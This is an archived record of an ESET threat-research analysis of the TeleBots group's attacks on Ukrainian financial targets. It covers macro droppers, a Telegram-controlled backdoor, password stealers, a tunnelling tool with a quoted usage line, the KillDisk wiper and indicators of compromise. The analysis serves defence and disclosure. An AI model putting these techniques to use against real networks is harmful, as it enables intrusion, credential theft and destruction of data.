{ "id": "5af6c274-6e87-4cdb-9fdf-809a6445c7ae", "created_at": "2026-04-06T00:09:51.323214Z", "updated_at": "2026-04-10T03:37:49.801109Z", "deleted_at": null, "sha1_hash": "2e269c4e5b0e6a3836676f0cf51642142d26828d", "title": "The rise of TeleBots: Analyzing disruptive KillDisk attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 333653, "plain_text": "The rise of TeleBots: Analyzing disruptive KillDisk attacks\r\nBy Anton Cherepanov\r\nArchived: 2026-04-05 14:27:54 UTC\r\nIn the second half of 2016, ESET researchers identified a unique malicious toolset that was used in targeted\r\ncyberattacks against high-value targets in the Ukrainian financial sector. We believe that the main goal of attackers\r\nusing these tools is cybersabotage. This blog post outlines the details about the campaign that we discovered.\r\nWe will refer to the gang behind the malware as TeleBots. However it’s important to say that these attackers, and\r\nthe toolset used, share a number of similarities with the BlackEnergy group, which conducted attacks against the\r\nenergy industry in Ukraine in December 2015 and January 2016. In fact, we think that the BlackEnergy group has\r\nevolved into the TeleBots group.\r\nInfection vector\r\nAs with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel\r\ndocuments attached that contain malicious macros as an initial infection vector. This time malicious documents\r\ndon’t have any content with social engineering directing potential victims to click an Enable Content button. It\r\nseems that the attackers are depending on the victims to decide entirely on their own whether to click it or not.\r\nFigure 1: One example of a malicious XLS document used in the spearphishing attack.\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 1 of 13\n\nUsually, the malicious documents don’t contain meaningful information in the metadata, but this time the\r\nmetadata of the document contains the nickname of the person who is responsible for its modification. Moreover,\r\nthis nickname matches that of an individual who is actively communicating within a Russian-speaking community\r\nof cybercriminals. However, we should say that it is possible that this was intended deceptively as a false flag or a\r\ncoincidence.\r\nFigure 2: Metadata reveals what might be the attacker's nickname.\r\nOnce a victim clicks on the Enable Content button, Excel executes the malicious macro. Our analysis shows that\r\nthe code of the macro used in TeleBots documents matches the macro code that was used by the BlackEnergy\r\ngroup in 2015. Figure 3 illustrates these similarities.\r\nThe main purpose of the macro is to drop a malicious binary using the explorer.exe filename and then to execute\r\nit. The dropped binary belongs to a trojan downloader family, its main purpose being to download and execute\r\nanother piece of malware. This trojan downloader is written in the Rust programming language.\r\nIt should be noted that during the first stages of the attack, the TeleBots group abuse various legitimate servers in\r\norder to hide malicious activity in the network. For example, the trojan downloader fetches data from a hardcoded\r\nURL that points to a text file on the putdrive.com service (which allows anyone to upload and share files online).\r\nThe text file that is hosted on the online service is a final payload, encoded using the Base64 algorithm.\r\nThe final payload is a backdoor written in Python and detected as the Python/TeleBot.AA trojan. This backdoor is\r\nthe main piece of malware used by these attackers, which is why we've named the TeleBots group as such.\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 2 of 13\n\nFigure 3: Similarities between malicious macro code used by BlackEnergy and TeleBots.\r\nPython/TeleBot.AA backdoor\r\nIn January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That\r\nattack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly\r\nthe same mail server to send spearphishing messages. However, the attacks in January 2016 were different.\r\nInstead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor,\r\nwritten in the Python programming language, called GCat. The Python code of the GCat backdoor was\r\nobfuscated, then converted into a stand-alone executable using the PyInstaller program.\r\nThe Python/TeleBot malware uses exactly the same approach; the Python backdoor code is obfuscated and packed\r\ninto a standalone executable using PyInstaller. In addition, the Python code is ROT13 encoded, AES encrypted,\r\ncompressed using zlib library and then Base64 encoded.\r\nBut what really makes this backdoor interesting is the way in which it communicates with attackers in order to\r\nreceive commands. Python/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with\r\nthe attackers. The Telegram Bot API is based on HTTP and to a network administrator within a compromised\r\nnetwork, the communication between the infected computer and the attackers will look like HTTP(S)\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 3 of 13\n\ncommunication with a legitimate server, specifically api.telegram.org. We have informed Telegram of this abuse\r\nof their communication platform.\r\nFigure 4: The Python/TeleBot.AA malware code that uses Telegram Bot API.\r\nEach of the samples we discovered has a unique token embedded in its code, which means that each sample uses\r\nits own Telegram Messenger account. Python/TeleBot uses private chats for communicating with the\r\ncybercriminals. This scheme allows the control of infected computers through any device with Telegram\r\nMessenger installed, even from a smartphone, just by issuing commands via chat.\r\nThe Python/TeleBot malware has support for following commands:\r\nCommand Purpose\r\ncmd\r\n%shellcmd%\r\nExecutes shell command and sends result in chat\r\ncmdd\r\n%shellcmd%\r\nExecutes shell command but does not send result in chat\r\ngetphoto\r\n%path%\r\nUploads picture from infected computer to chat\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 4 of 13\n\nCommand Purpose\r\ngetdoc\r\n%path%\r\nUploads any type of file up to 50 MB in size to chat\r\nforcecheckin\r\n%random%\r\nCollects Windows version, platform (x64 or x86), current privileges\r\ntime\r\n%seconds%\r\nChanges interval between execution of commands\r\nss\r\nCaptures screenshot (not implemented)\r\nIn addition, the malware automatically saves all incoming files from the attacker to its own folder. By this means,\r\nattackers can push additional malicious tools to an infected computer. During our research, we were able to find a\r\nTelegram account belonging to one of the attackers.\r\nFigure 5: Profile of one of the attackers in Telegram Messenger.\r\nIt should be noted that the Telegram Bot API was not the only legitimate protocol that was used by these attackers.\r\nWe have seen at least one sample of this backdoor that uses an outlook.com mailbox as C\u0026C.\r\nPassword stealing malicious tools\r\nAfter successful compromise of the network, attackers use various malicious tools in order to collect passwords,\r\nallowing them to subsequently perform a lateral movement within the compromised LAN.\r\nA string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the\r\nattackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer,\r\nMozilla Firefox, and Opera.\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 5 of 13\n\nFigure 6: PDB-Path reveals the name of the password stealer.\r\nThe attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool\r\nis a slightly modified version of the open-source project mimikatz.\r\nIn addition to plainpwd and CredRaptor the toolkit includes a keylogger. The keylogger uses a standard technique\r\nto capture keystrokes, specifically the SetWindowsHookEx function.\r\nIn order to also sniff passwords in network traffic, the attackers use a console version of Interceptor-NG. Since it\r\nrequires WinPcap drivers to be installed, the attackers made a custom tool to install them silently.\r\nFigure 7: Intercepter-NG password sniffing tool.\r\nThe combined use of all these tools allows attackers to gain a foothold in a compromised network, with the\r\nobjective of gaining full control by obtaining domain administrator privileges.\r\nLDAP query tool\r\nAnother interesting discovery was a tool that was used during attacks to make queries to Active Directory using\r\nLDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory,\r\nand is tailored for a specific victim’s domain.\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 6 of 13\n\nFigure 8: Disassembled code of the tailored LDAP query tool.\r\nAdditional backdoor\r\nFurther research revealed that the attackers deployed additional backdoors in order to regain access to the\r\ncompromised network, should their main Python/TeleBot backdoor be discovered and removed. This additional\r\nbackdoor is written in VBS and some samples we discovered were packaged using the script2exe program.\r\nFigure 9: Source code of additional backdoor written in VBS.\r\nThere are several samples of this VBS backdoor, but all of them have pretty straightforward functionality. The\r\nbackdoor sends the computer name and MAC address of the computer executing it to its C\u0026C server using HTTP.\r\nThe variable timeout defines the period of time in minutes between calls to the server. The server can push\r\nadditional commands for execution. Here is a list of supported commands:\r\nCommand Purpose\r\n!cmd Executes shell command and sends results back to the server\r\n!cmdd Executes shell command but does not send result back to the server\r\n!dump DecodesBase64 data and saves it to %TEMP% folder\r\n!timeout Defines a new timeout between calls to server\r\n!bye Quits\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 7 of 13\n\nCommand Purpose\r\n!kill Quits and deletes itself\r\n!up Uploads file from agent computer to C\u0026C server\r\nBCS-server\r\nThe attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into\r\nan internal network and then this tunnel can be used to send and receive data between the C\u0026C server and even\r\nnon-infected computers in the network. The main idea of this tool is based on the same principles as the\r\nXTUNNEL malware used by the Sednit group.\r\nDuring our analysis we discovered that the attackers used a guide for this specific tool. Interestingly, the guide was\r\nwritten in Russian.\r\nFigure 10: Guide for BCS-server in Russian.\r\nThe guide in Russian can be roughly translated as:\r\nParameters\r\n-saddr – address of BCS server\r\n-hport – port of a host, which we did setup on the server, this how we bypass firewall\r\nExamples:\r\nphost_win.exe –saddr=10.10.10.10 –hport=80\r\nDebug versions:\r\nphost_cnv.exe – console version\r\nphost_win_log.exe – version that logs to file\r\nSo attackers specify an external C\u0026C server in the command line and the tool connects to this server using HTTP.\r\nThis remote server is used as a proxy by attackers: the connection that goes to this server is redirected to the\r\ninternal network by the tool and any response that the tool gets from a computer in the internal network goes to\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 8 of 13\n\nthe C\u0026C server. Thus, attackers can communicate with internal servers that are normally unreachable from the\r\ninternet.\r\nThe communication traffic between the BCS-server tool and the C\u0026C server is base64 encoded and encapsulated\r\nin HTML tags.\r\nFigure 11: The captured handshake of BCS-server tool and C\u0026C server.\r\nKillDisk\r\nThe KillDisk is a destructive component that is used by these attackers as the final stage of an attack. Previous\r\nversions of this component were used in attacks against media companies in November 2015 and against power\r\ngrid companies in Ukraine in December 2015.\r\nKillDisk is designed to run with high privileges, this time it registers itself as a service under Plug-And-Play\r\nSupport name. Since at the final stage attackers have probably collected network administrator level credentials,\r\nthat’s why they are using Microsoft PsExec in order to execute KillDisk with the highest possible privileges on\r\nservers and workstations.\r\nThe attackers may specify an activation date of KillDisk via the command line. However, one of the samples had a\r\npredefined activation time that is set to 9:30am, 6 December 2016.\r\nThere are improvements in the code, however the main idea of KillDisk hasn’t change so much - it deletes\r\nimportant system files and makes computer unbootable. Beside that it also overwrites files with specific file\r\nextensions – those defined by the malware authors in this version of KillDisk are:\r\n.kdbx .bak .back .dr .bkf .cfg .fdb .mdb .accdb .gdb .wdb .csv .sdf .myd .dbf .sql .edb .mdf .ib .db3 .db4\r\n.accdc .mdbx .sl3 .sqlite3 .nsn .dbc .dbx .sdb .ibz .sqlite .pyc .dwg .3ds .ai .conf .my .ost .pst .mkv .mp3\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 9 of 13\n\n.wav .oda .sh .py .ps .ps1 .php .aspx .asp .rb .js .git .mdf .pdf .djvu .doc .docx .xls .xlsx .jar .ppt .pptx .rtf\r\n.vsd .vsdx .jpeg .jpg .png .tiff .msi .zip .rar .7z .tar .gz .eml .mail .ml .ova .vmdk .vhd .vmem .vdi .vhdx\r\n.vmx .ovf .vmc .vmfx .vmxf .hdd .vbox .vcb .vmsd .vfd .pvi .hdd .bin .avhd .vsv .iso .nrg .disk .hdd .pmf\r\n.vmdk .xvd\r\nThe KillDisk malware may create new, small files instead of deleted ones with the exact same filename and these\r\nnew files will contain one of two strings mrR0b07 or fS0cie7y instead of the original content. This is not the only\r\nreference to the Mr. Robot TV show, in addition this KillDisk variant displays the picture that is illustrated in\r\nFigure 12.\r\nFigure 12: Picture displayed by KillDisk component.\r\nInterestingly, the KillDisk malware does not store this picture anywhere: rather it has code that draws this picture\r\nin real-time using the Windows GDI. It looks like attackers put a lot of effort just to make the code that draws this\r\npicture.\r\nConclusion\r\nThe cybercriminals behind these targeted attacks demonstrate serious intention to conduct cybersabotage attacks.\r\nTo be able to mount such attacks, they are constantly inventing new malware and techniques, such as the use of\r\nthe Telegram Bot API instead of a more conventional C\u0026C server for example.\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 10 of 13\n\nSpecial thanks to David Gabris for help with the analysis.\r\nIndicators of Compromise (IoC)\r\nTeleBots IoCs are also available on ESET’s GitHub repository.\r\nESET detection names:\r\nVBA/TrojanDropper.Agent.SD trojan\r\nWin32/TrojanDownloader.Agent.CWY trojan\r\nPython/TeleBot.AA trojan\r\nPython/Agent.Q trojan\r\nPython/Agent.AE trojan\r\nPython/Agent.AD trojan\r\nVBS/Agent.AQ trojan\r\nVBS/Agent.AO trojan\r\nVBS/Agent.AP trojan\r\nWin32/HackTool.NetHacker.N trojan\r\nWin32/HackTool.NetHacker.O trojan\r\nWin32/PSW.Agent.OCO trojan\r\nWin64/Riskware.Mimikatz.H application\r\nWin32/RiskWare.Mimikatz.I application\r\nWin32/PSW.Delf.OQU trojan\r\nWin32/PSW.Agent.OCP trojan\r\nWin64/Spy.KeyLogger.G trojan\r\nWin32/KillDisk.NBH trojan\r\nWin32/KillDisk.NBI trojan\r\nC\u0026C Servers:\r\n93.190.137.212\r\n95.141.37.3\r\n80.233.134.147\r\nLegitimate servers abused by malware authors:\r\nsrv70.putdrive.com (IP: 188.165.14.185)\r\napi.telegram.org (IP: 149.154.167.200, 149.154.167.197, 149.154.167.198, 149.154.167.199)\r\nsmtp-mail.outlook.com (IP: 65.55.176.126)\r\nXLS documents with malicious macro SHA-1:\r\n7FC462F1734C09D8D70C6779A4F1A3E6E2A9CC9F\r\nC361A06E51D2E2CD560F43D4CC9DABE765536179\r\nWin32/TrojanDownloader.Agent.CWY SHA-1:\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 11 of 13\n\nF1BF54186C2C64CD104755F247867238C8472504\r\nPython/TeleBot.AA backdoor SHA-1:\r\n16C206D9CFD4C82D6652AFB1EEBB589A927B041B\r\n1DC1660677A41B6622B795A1EB5AA5E5118D8F18\r\n26DA35564D04BB308D57F645F353D1DE1FB76677\r\n30D2DA7CAF740BAAA8A1300EE48220B3043A327D\r\n385F26D29B46FF55C5F4D6BBFD3DA12EB5C33ED7\r\n4D5023F9F9D0BA7A7328A8EE341DBBCA244F72C5\r\n57DAD9CDA501BC8F1D0496EF010146D9A1D3734F\r\n68377A993E5A85EB39ADED400755A22EB7273CA0\r\n77D7EA627F645219CF6B8454459BAEF1E5192467\r\n7B87AD4A25E80000FF1011B51F03E48E8EA6C23D\r\n7C822F0FDB5EC14DD335CBE0238448C14015F495\r\n86ABBF8A4CF9828381DDE9FD09E55446E7533E78\r\n9512A8280214674E6B16B07BE281BB9F0255004B\r\nB2E9D964C304FC91DCAF39FF44E3C38132C94655\r\nFE4C1C6B3D8FDC9E562C57849E8094393075BC93 \r\nVBS backdoors SHA-1:\r\nF00F632749418B2B75CA9ECE73A02C485621C3B4\r\n06E1F816CBAF45BD6EE55F74F0261A674E805F86\r\n35D71DE3E665CF9D6A685AE02C3876B7D56B1687\r\nF22CEA7BC080E712E85549848D35E7D5908D9B49\r\nC473CCB92581A803C1F1540BE2193BC8B9599BFE \r\nBCS-server SHA-1:\r\n4B692E2597683354E106DFB9B90677C9311972A1\r\nBF3CB98DC668E455188EBB4C311BD19CD9F46667 \r\nModified Mimikatz SHA-1:\r\nB0BA3405BB2B0FA5BA34B57C2CC7E5C184D86991\r\nAD2D3D00C7573733B70D9780AE3B89EEB8C62C76\r\nD8614BC1D428EBABCCBFAE76A81037FF908A8F79\r\nLDAP query tool SHA-1:\r\n81F73C76FBF4AB3487D5E6E8629E83C0568DE713\r\nCredRaptor password stealer SHA-1:\r\nFFFC20567DA4656059860ED06C53FD4E5AD664C2\r\n58A45EF055B287BAD7B81033E17446EE6B682E2D\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 12 of 13\n\nWin64/Spy.KeyLogger.G trojan SHA-1:\r\n7582DE9E93E2F35F9A63B59317EBA48846EEA4C7\r\nIntercepter-NG and silent WinPCAP installer SHA-1:\r\n64CB897ACC37E12E4F49C4DA4DFAD606B3976225\r\nA0B9A35675153F4933C3E55418B6566E1A5DBF8A\r\nWin32/KillDisk SHA-1:\r\n71A2B3F48828E4552637FA9753F0324B7146F3AF\r\n8EB8527562DDA552FC6B8827C0EBF50968848F1A\r\nSource: https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 13 of 13\n\nextensions – .kdbx those defined by .bak .back .dr .bkf the malware authors .cfg .fdb .mdb in this version .accdb .gdb .wdb of KillDisk .csv .sdf .myd are: .dbf .sql .edb .mdf .ib .db3 .db4\n.accdc .mdbx .sl3 .sqlite3 .nsn .dbc .dbx .sdb .ibz .sqlite .pyc .dwg .3ds .ai .conf .my .ost .pst .mkv .mp3\n Page 9 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "references": [ "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "report_names": [ "rise-telebots-analyzing-disruptive-killdisk-attacks" ], "threat_actors": [ { "id": "39842197-944a-49fd-9bec-eafa1807e0ea", "created_at": "2022-10-25T16:07:24.310589Z", "updated_at": "2026-04-10T02:00:04.931264Z", "deleted_at": null, "main_name": "TeleBots", "aliases": [], "source_name": "ETDA:TeleBots", "tools": [ "BadRabbit", "Black Energy", "BlackEnergy", "CredRaptor", "Diskcoder.C", "EternalPetya", "ExPetr", "Exaramel", "FakeTC", "Felixroot", "GreyEnergy", "GreyEnergy mini", "KillDisk", "LOLBAS", "LOLBins", "Living off the Land", "NonPetya", "NotPetya", "Nyetya", "Petna", "Petrwrap", "Pnyetya", "TeleBot", "TeleDoor", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "nPetya" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434191, "ts_updated_at": 1775792269, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2e269c4e5b0e6a3836676f0cf51642142d26828d.pdf", "text": "https://archive.orkl.eu/2e269c4e5b0e6a3836676f0cf51642142d26828d.txt", "img": "https://archive.orkl.eu/2e269c4e5b0e6a3836676f0cf51642142d26828d.jpg" } }